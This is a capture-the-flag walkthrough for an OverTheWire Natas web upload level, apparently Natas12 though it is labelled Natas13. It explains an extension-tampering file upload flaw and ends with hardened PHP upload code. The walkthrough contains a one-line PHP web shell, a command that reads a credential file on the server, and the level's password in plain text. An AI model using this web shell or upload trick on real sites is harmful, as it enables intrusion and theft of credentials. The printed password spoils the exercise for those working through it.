NatasOverTheWire

Natas13

Website URL: http://overthewire.org/wargames/natas/natas13.html

According to the data on the OverTheWire webpage:

Username: natas13
URL:      http://natas13.natas.labs.overthewire.org

Let’s log into the URL for Natas12.

Fig. 1

Looking at the source code:

Fig. 2

It seems the script takes the file we supply and saves it on the server under a randomized name, but always with a “.jpg” extension. Let’s see what happens if we upload a file type other than a JPEG image. I’ll try and upload a file named “test.txt” containing some text.

Meanwhile, let’s also intercept the POST request that the page sends, so we can see its contents. I’ll do it using Burp Suite and skip straight to the interesting part here.

Fig. 3

Here we can see clearly what’s happening: the page’s script generates the filename and sends it in the request, and the server then answers with the following response on the webpage:

Fig. 4

Note that the filename sent by the script is not the same as the one the server returns in the file path, so the filename itself is of little consequence to us. The crucial part is the file extension, which stays the same. The next logical question is: “What if we tamper with the file extension?” I would expect the file on the server to keep the modified extension, and since we get a path to the file, an executable/runnable extension should let us execute it.

To test this hypothesis, we first need a payload, i.e. the file we’d be executing on the server. The payload could be in any language the server supports. As a safe bet, I’ll prefer PHP, since we already know the server supports it.

<?php
passthru($_GET['cmd']);
?>

This simple payload takes a shell command from a GET parameter and executes it. Let’s save it and upload it to the server. We also have to intercept the POST request to change the extension: once intercepted, change the “.jpg” extension to “.php”.

Fig. 5

Forward the modified request and look at the response in the browser.

Fig. 6

We now have a PHP file on the server! Let’s navigate to it and add the GET parameter, which can be done in the URL itself.

We need to append the following to the file path:

http://natas12.natas.labs.overthewire.org/upload/j6yopq02vo.php?cmd=cat%20/etc/natas_webpass/natas13

Fig. 7

Done!

Password for next level: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
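The root cause of this level is an upload handler that lets the client decide the stored extension. As an added example (not the Natas12 source, and with assumed form field names 'filename' and 'uploadedfile'), here is a handler in the shape the writeup describes next to a hardened version that decides the name and extension itself:

```php
<?php
// Added illustration, not the Natas12 source. Field names 'filename' and
// 'uploadedfile' are assumptions made for this example.

// --- Vulnerable: the target name (and so the extension) comes from the
// POST body, which any intercepting proxy can rewrite from .jpg to .php.
function vulnerable_save(string $upload_dir): string
{
    $target = $upload_dir . basename($_POST['filename']);
    move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target);
    return $target;   // a .php file inside the web root is now reachable
}

// --- Hardened: the client never chooses the name or the extension.
function hardened_save(string $upload_dir): ?string
{
    $f = $_FILES['uploadedfile'] ?? null;
    if ($f === null || $f['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    // Pick the extension from the bytes actually uploaded, not from the
    // client-supplied filename or Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png'];
    if (!isset($allowed[$mime])) {
        return null;          // reject anything that is not a real image
    }
    // Server-generated random name; only an allow-listed extension can result.
    $name   = bin2hex(random_bytes(8)) . '.' . $allowed[$mime];
    $target = rtrim($upload_dir, '/') . '/' . $name;
    if (!move_uploaded_file($f['tmp_name'], $target)) {
        return null;
    }
    chmod($target, 0644);     // stored as data, never executable
    return $target;
}
```

Even with the hardened handler, the upload directory should be served with script execution disabled (for mod_php, `php_flag engine off` in that directory's .htaccess), so a misclassified file is still never interpreted as PHP.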
